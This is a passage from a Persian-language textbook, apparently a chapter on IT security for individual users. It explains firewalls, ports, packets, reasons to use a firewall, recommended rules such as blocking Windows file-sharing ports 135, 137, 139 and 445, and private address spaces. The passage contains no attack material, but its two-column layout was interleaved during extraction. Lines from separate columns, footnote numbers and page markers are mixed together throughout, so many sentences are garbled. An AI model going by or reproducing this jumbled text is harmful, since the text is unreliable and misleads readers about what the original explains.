‫ﻣﺎﻩ‪ ،‬ﻭﻳﺮﻭﺱﻳﺎﺏ ‪ Norton‬ﺣﺪﻭﺩ ‪ ۵۰‬ﻧﺸﺎﻥ ﺟﺪﻳـﺪ ﻭﻳـﺮﻭﺱ ﺭﺍ‬
‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻣﻲﺑﻴﻨﻴـﺪ ﻣﺘـﺸﻜﻞ ﺍﺯ ﭼﻬـﺎﺭ ﻋـﺪﺩ ﻣﺠـﺰﺍ‬
‫ﺑﻪ ﻓﻬﺮﺳﺖ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ ﺧﻮﺩ ﺍﺿﺎﻓﻪ ﻧﻤـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﺍﺳﺖ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻣﺴﻴﺮ ﭘﻴﺎﻡ ﺍﺯ ﺍﻳﻦ ﺁﺩﺭﺱ‬
‫ﻋﺪﺩ ﺗﺎ ﻳﻜﻤﺎﻩ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺑﻪ ﺣﺪﻭﺩ ‪ ۵۲۰‬ﺭﺳﻴﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻭ ﻫﺮ ﺭﺍﻳﺎﻧـﻪ ﺑـﺎ ﺍﺭﺍﺋـﻪ ﺁﺩﺭﺱ ﻣﻘـﺼﺪ ﺩﺭ‬
‫ﭼﻨﻴﻦ ﻗﺎﻟﺒﻲ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳـﻦ ﭘﻴﺎﻣﻬـﺎ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬
‫ﻛﺠﺎ ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ‪.‬‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻤﺎﻣﻲ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺩﺍﺧﻞ ﻳﺎ ﺧـﺎﺭﺝ ﺍﺯ ﺷـﺒﻜﻪ ﺭﺍ‬
‫ﺩﺭ ﻫﺮ ﺩﺳـﺘﮕﺎﻩ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑﻮﺳـﻴﻠﻪ ﺷـﻤﺎﺭﺓ‬ ‫•‬
‫‪١٠٩‬‬ ‫ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻭ ﺑﺮ ﺍﺳﺎﺱ ﻣﺠﻤﻮﻋﻪ ﻗﻮﺍﻧﻴﻦ ﻣﻮﺟﻮﺩ ﺩﺭ ﺧﻮﺩ ﺑـﻪ‬
‫ﭘﻮﺭﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ )ﻣﺎﻧﻨﺪ ﺷـﻤﺎﺭﻩ ﺗﻠﻔﻨﻬـﺎﻱ ﺩﺍﺧﻠـﻲ‬
‫ﺗﻠﻔﻦ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ‪ -‬ﺗﻨﻬﺎ ﻳﻚ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻦ ﻋﻤـﻮﻣﻲ ﻭﺟـﻮﺩ‬ ‫ﺗﺮﺍﻓﻴﻚ‪ ١٠٧‬ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺷﺒﻜﻪ ﻋﺒﻮﺭ ﻛﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﻣﺘﻮﻗـﻒ‬
‫ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﻫﺮ ﺍﺗﺎﻕ ﺷﻤﺎﺭﺓ ﺩﺍﺧﻠﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﺩ(‪.‬‬ ‫ﻣﻲﺳﺎﺯﺩ‪ .‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻜﻞ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ‬
‫ﻧﺼﺐ ﺷﻮﺩ ﻳﺎ ﻗﺴﻤﺘﻲ ﺍﺯ ﺗﺠﻬﻴـﺰﺍﺕ ﻣﻴـﺎﻥ ﺭﺍﻳﺎﻧـﻪ )ﻳـﺎ ﮔﺮﻭﻫـﻲ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﻳـﺎ ﺍﺯ ﺁﻥ ﻓﺮﺳـﺘﺎﺩﻩ ﻣـﻲﺷـﻮﻧﺪ‪،‬‬ ‫•‬
‫ﻱ ﺁﻥ ﺑﺎﺷﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎ( ﻭ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍ ﹺ‬
‫ﺑﺴﺘﻪ‪ ١١٠‬ﻧﺎﻡ ﺩﺍﺭﻧﺪ‪.‬‬ ‫‪١٠٨‬‬
‫ﺩﺭ ﺑﻌــﻀﻲ ﺗﺠﻬﻴــﺰﺍﺕ ﺩﻳﮕــﺮ ﻣﺎﻧﻨــﺪ ﻣــﺴﻴﺮﻳﺎﺑﻬﺎ ﻗــﺮﺍﺭ ﺩﺍﺩﻩ‬
‫ﺍﺯ ﻛﻠﻤﺎﺕ ‪ TCP‬ﻭ ‪ UDP‬ﺩﺭ ﺑﺤﺚ ﺯﻳـﺮ ﭼـﺸﻢ ﭘﻮﺷـﻲ‬ ‫•‬ ‫ﻻ ﺭﺍﻳﮕــﺎﻥ ﻭ‬
‫ﻣــﻲﺷــﻮﺩ‪ .‬ﺍﻳــﻦ ﻧــﻮﻉ ﺩﻳــﻮﺍﺭﻩﻫــﺎﻱ ﺁﺗــﺶ ﻣﻌﻤــﻮ ﹰ‬
‫ﻛﻨﻴﺪ ﻭ ﭼﻨﺪﺍﻥ ﻧﮕﺮﺍﻥ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺟﺰﺋﻴﺎﺕ ﻧﺒﺎﺷﻴﺪ‪.‬‬ ‫ﺍﺯ ﭘﻴﺶ ﻧﺼﺐﺷﺪﻩ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭﺟﻮﺩ‬
‫ﺩﺍﺭﻧﺪ‪.‬‬
‫ﭼﺮﺍ ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﻴﺎﺯ ﺩﺍﺭﻳﻢ؟‬
‫ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻪ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﻧﻴﺴﺖ ﻧﻴﺎﺯﻱ‬ ‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﺳﻮﻡ‪:‬‬
‫ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﺪﺍﺭﻳﺪ‪ .‬ﻫﻤﻴﻨﻜﻪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ ﺷـﻮﻳﺪ ﺍﻳـﻦ‬ ‫ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ‬
‫ﺍﺣﺘﻤــﺎﻝ ﭘﺪﻳــﺪ ﻣــﻲﺁﻳــﺪ ﻛــﻪ ﻣﻬــﺎﺟﻤﻴﻦ ﺭﺍﻳﺎﻧــﺔ ﺷــﻤﺎ ﺭﺍ ﻣــﻮﺭﺩ‬ ‫ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ ﻛﻪ ﻣﻲ ﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺼﻮﺭﺕ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪:‬‬ ‫ﺩﺭ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻧﺼﺐ ﻧﻤﻮﺩ ﻳـﺎ ﺑـﺼﻮﺭﺕ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ‬
‫ﺁﺗﺶ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻗـﺮﺍﺭ‬
‫ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ‪ ،‬ﺍﺷﺘﺮﺍﻙ ﭼﺎﭘﮕﺮ ﻳـﺎ ﺳـﺎﻳﺮ ﺧـﺪﻣﺎﺕ‬ ‫•‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ‪ ،‬ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ‬ ‫ﺩﺍﺩ‪.‬‬
‫ﻣﺸﺨﺼﻲ ﺑﻪ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺍﻳﺴﺘﺪ )ﺩﺭ ﺍﺻﻄﻼﺡ ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ ﻛﻪ‬ ‫ﺑﺎ ﺩﺭﻙ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﭼﻪ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫـﺪ‬
‫ﺭﺍﻳﺎﻧــﻪ ﺁﻥ ﭘــﻮﺭﺕ ﺭﺍ "ﻣــﻲﺷــﻨﻮﺩ"(‪ .‬ﺍﮔﺮﭼــﻪ ﺑــﺎ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ‬ ‫ﻭ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻗﻮﺍﻧﻴﻨﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺁﻥ ﺗﻨﻈـﻴﻢ ﻧﻤـﻮﺩ ﺑﺎﻳـﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﻨﺎﺑﻊ ﺧﻮﺩ ﺭﺍ ﺑـﺎ ﺭﺍﻳﺎﻧـﺔ ﺩﻳﮕـﺮﻱ ﺑـﻪﺍﺷـﺘﺮﺍﻙ‬ ‫ﻣﻔﻬﻮﻡ ﭘﺮﻭﺗﻜـﻞ ‪ - TCP/IP‬ﻣﺠﻤﻮﻋـﻪ ﻗـﻮﺍﻧﻴﻨﻲ ﻛـﻪ ﺗﻤـﺎﻣﻲ‬

‫‪109 Port Number‬‬ ‫‪ ۱۰۷‬ﻣﻨﻈﻮﺭ ﺍﻃﻼﻋﺎﺕ ﺗﺒﺎﺩﻝ ﺷﺪﻩ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﺳﺖ‬
‫‪110 Packet‬‬ ‫‪108 Router‬‬
‫‪٩٥‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺁﺩﺭﺱ ‪ IP‬ﻣﺒﺪﺃ ﺁﻥ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎﺷـﺪ‬ ‫ﺑﮕﺬﺍﺭﻳﺪ‪ ،‬ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕـﺮﻱ ﺩﺭ ﻫـﺮ ﻧﻘﻄـﺔ‬
‫ﻛﻪ ﺷﻤﺎ ﻣﺎﻳﻠﻴﺪ ﺍﺯ ﺧﺪﻣﺎﺕ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬ ‫ﺩﻧﻴﺎ ﻧﻴﺰ ﺑﺘﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﻃﻤﻴﻨﺎﻧﻲ ﻛـﻪ ﺑـﻪ‬ ‫•‬ ‫ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴـﺪ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺑـﻪ ﺍﻧﺘﻈـﺎﺭ‬ ‫•‬
‫ﺷﺒﻜﻪ ﺁﺳﻴﺐ ﻧﻤﻲﺭﺳﺎﻧﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺗﻌﺮﻳـﻒ‬ ‫ﺑﺎﻳﺴﺘﻴﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺍﺷﻜﺎﻻﺕ‪ ،‬ﺷﺨﺼﻲ‬
‫ﻛﻨﻴﺪ ﺗﺎ ﺗﻨﻬﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻄﻤﺌﻦ ﺑﺘﻮﺍﻧﻨﺪ ﺑـﺎ ﺷـﻤﺎ ﺍﺭﺗﺒـﺎﻁ‬ ‫ﺑﺘﻮﺍﻧﺪ ﺑﺮﺍﻳﺘﺎﻥ ﭘﻴﺎﻡ ﻣﺎﻫﺮﺍﻧـﻪﺍﻱ ﺑﻔﺮﺳـﺘﺪ ﻭ ﺍﺯ ﺁﻥ ﻃﺮﻳـﻖ‬
‫ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﺎﻥ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺳـﺎﻳﺮ‬ ‫ﺍﻋﻤﺎﻝ ﻣﺨﺮﺑﻲ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺎﻧﻨﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻧﻴـﺰ‬ ‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻴﺪ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺷﻤﺎ ﺑﺎﻳﺪ ﺁﻏﺎﺯ ﻛﻨﻨﺪﺓ‬ ‫ﺣﺘﻲ ﺍﮔﺮ ﻧﺘﻮﺍﻧﻴﺪ ﺭﻭﻱ ﻫﻴﭻ ﭘﻮﺭﺗﻲ ﻣﻨﺘﻈـﺮ ﭘﻴـﺎﻡ ﺑﻤﺎﻧﻴـﺪ‬ ‫•‬
‫ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺑﺎﺷﻴﺪ‪.‬‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻫﻤﭽﻨﺎﻥ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﭘﻴﺎﻣﻬـﺎﻱ ﺯﻳـﺎﺩﻱ‬
‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﻣﻨـﺎﺑﻊ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺑﻜـﺎﺭ‬ ‫ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺗﻤﺎﻣﻲ ﺁﻧﻬـﺎ‬
‫ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺍﻳﻦ ﻣﺰﻳﺖ ﻛﻪ ﺗﻨﻬﺎ ﻣﺤﺘﻮﺍﻱ ﺍﻃﻼﻋﺎﺕ )ﻫﻤﺮﺍﻩ ﺑﺎ‬ ‫ﺻﺮﻓﻨﻈﺮ ﻛﺮﺩ ﺍﻣﺎ ﭘﻴﺎﻣﻬﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺷـﺒﻜﻪﺍﻱ‬
‫ﺁﺩﺭﺳﻬﺎ ﻭ ﭘﻮﺭﺗﻬﺎﻱ ﻓﺮﺳﺘﻨﺪﻩ ﻳﺎ ﮔﻴﺮﻧﺪﺓ ﺁﻥ( ﺭﺍ ﺑﺮﺭﺳﻲ ﻧﻤﻲﻛﻨﻨﺪ؛ ﺑﻠﻜـﻪ‬ ‫ﺷﻤﺎ ﺭﺍ ﻣﺴﺪﻭﺩ ﻛﻨﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻧﺘﻮﺍﻧﻴﺪ ﻛﺎﺭﻫﺎﻱ ﺧﻮﺩ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﺑﺮﻧﺎﻣﻪﺍﻱ ﭘﻴﺎﻡ ﺭﺍ ﺍﺭﺳـﺎﻝ ﻧﻤـﻮﺩﻩ‬ ‫ﺭﺍ ﺍﻧﺠــﺎﻡ ﺩﻫﻴــﺪ )ﺩﺭ ﺍﻳــﻦ ﻣــﻮﺭﺩ ﻓﻘــﻂ ﺩﻳــﻮﺍﺭﻩﻫــﺎﻱ ﺁﺗــﺶ‬
‫ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻏﻴﺮﻣﺠﺎﺯ ﺑـﺎ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ‬ ‫ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ(‪.‬‬
‫ﻛﺮﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻗﺒﻞ ﺍﺯ ﻋﺒﻮﺭ ﺩﺍﺩﻥ ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺷﻤﺎ‬ ‫ﺍﮔﺮ ﻋﻠﻴﺮﻏﻢ ﺗﻼﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ‪ ،‬ﺗﻮﺳﻂ ﻭﻳﺮﻭﺱ‪ ،‬ﻛـﺮﻡ ﻳـﺎ‬ ‫•‬
‫ﻛﺴﺐ ﺍﺟـﺎﺯﻩ ﻛﻨـﺪ‪ .‬ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖ ﺍﻓـﺰﺍﺭﻱ ﻧﻤـﻲ ﺗﻮﺍﻧـﺪ‬
‫ﺗﺮﺍﻭﺍ ﺁﻟﻮﺩﻩ ﺷﺪﻳﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻛﺪﺍﻡ ﺑﺮﻧﺎﻣﻪ ﺑـﺮﺍﻱ ﺍﺭﺳـﺎﻝ ﭘﻴـﺎﻡ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﻧﻮﻳﺴﻨﺪﺓ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﺍﺭﺳﺎﻝ ﺷـﻮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﺷﺪﻩ؛ ﺍﻣﺎ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻳﻚ ﻗﺴﻤﺖ ﺍﺯ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ‬
‫ﻣﻮﺭﺩ ﺷﺎﻣﻞ ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﻤﺎﻣﻲ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ ﻗﺮﺑـﺎﻧﻲ‬
‫ﺍﺳﺖ‪ ،‬ﺳﺮﻋﺖ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﭘﺎﻳﻴﻦ ﻧﻤﻲﺁﻭﺭﺩ‪.‬‬ ‫ﺛﺒﺖ ﺷﺪﻩ )ﺍﺯ ﺟﻤﻠﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ( ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﮔﺮ ﺩﺍﺭﺍﻱ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﻫﺴﺘﻴﺪ‬
‫ﻣــﺸﺎﺑﻪ ﺗﻤــﺎﻣﻲ ﺗﺠﻬﻴــﺰﺍﺕ ﺍﻣﻨﻴﺘــﻲ ﺩﻳﮕــﺮ ﺑﺎﻳــﺪ ﻫﻤﻴــﺸﻪ ﺁﻧــﺮﺍ‬ ‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ؟‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ‪ .‬ﺧﺮﺍﺑﻜﺎﺭﺍﻥ ﺑﺴﻴﺎﺭ ﺧﻼﻕ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﺑـﻪ ﺭﻭﺯ‬ ‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺗﻤﺎﻣﻲ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ‬
‫ﺑﻮﺩﻥ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻳﺪ‬ ‫ﺭﺍ ﻧﻈﺎﺭﺕ ﻭ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻛﻪ ﺁﻳﺎ ﺑﺎ ﻗﻮﺍﻧﻴﻦ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩ‬
‫ﺍﺯ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪.‬‬ ‫ﻣﻐﺎﻳﺮﺕ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﻮﺩ ﺭﺍﻩ ﻋﺒﻮﺭ ﺑـﺴﺘﻪﻫـﺎ ﻣـﺴﺪﻭﺩ‬
‫‪١١١‬‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺳﺨﺖﺍﻓـﺰﺍﺭﻱ ﺑﻬﺘـﺮ‬
‫ﻓﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ ﺧﺼﻮﺻﻲ‬
‫ﺍﺳﺖ ﻗﻮﺍﻧﻴﻦ ﺯﻳﺮ ﭘﻴﺎﺩﻩ ﺷﻮﻧﺪ‪:‬‬
‫ﻃﺮﺍﺣﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﺍﺑﺘﺪﺍ ﺑﺪﻳﻨﺼﻮﺭﺕ ﺑﻮﺩ ﻛﻪ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺩﺳﺘﮕﺎﻩ‬ ‫ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﻫـﻴﭻ ﺑـﺴﺘﻪﺍﻱ ﺍﺯ ﭘﻮﺭﺗﻬـﺎﻱ ‪،137 ،135‬‬ ‫•‬
‫ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻥ ﺁﺩﺭﺱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧـﻮﺩ ﺭﺍ ﺩﺍﺷـﺖ ﻭ ﻟـﺬﺍ ﻫـﺮ‬ ‫‪ ،139‬ﻭ ‪ TCP/UDP 445‬ﻋﺒــﻮﺭ ﻛﻨــﺪ‪ .‬ﺍﻳــﻦ ﭘﻮﺭﺗﻬــﺎ‬
‫ﺭﺍﻳﺎﻧﻪ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪ .‬ﺍﻣـﺮﻭﺯﻩ ﺑـﻪ‬ ‫ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺧﺪﻣﺎﺕ‬
‫ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺟﻬـﺎﻧﻲ ﺩﺭ ﺍﻳـﻦ ﺳـﻄﺢ ﭼﻨـﺪﺍﻥ‬
‫‪ Windows‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧـﺪ‪ .‬ﺑـﺎ ﻣﺘﻮﻗـﻒ‬
‫ﻣﻄﻠﻮﺏ ﻧﻴﺴﺖ‪ .‬ﺩﻭ ﺩﻟﻴﻞ ﻋﻤﺪﻩ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬ ‫ﺳــﺎﺧﺘﻦ ﺍﻳــﻦ ﺑــﺴﺘﻪﻫــﺎ ﺍﻃﻤﻴﻨــﺎﻥ ﺧﻮﺍﻫﻴــﺪ ﻳﺎﻓــﺖ ﻛــﻪ‬
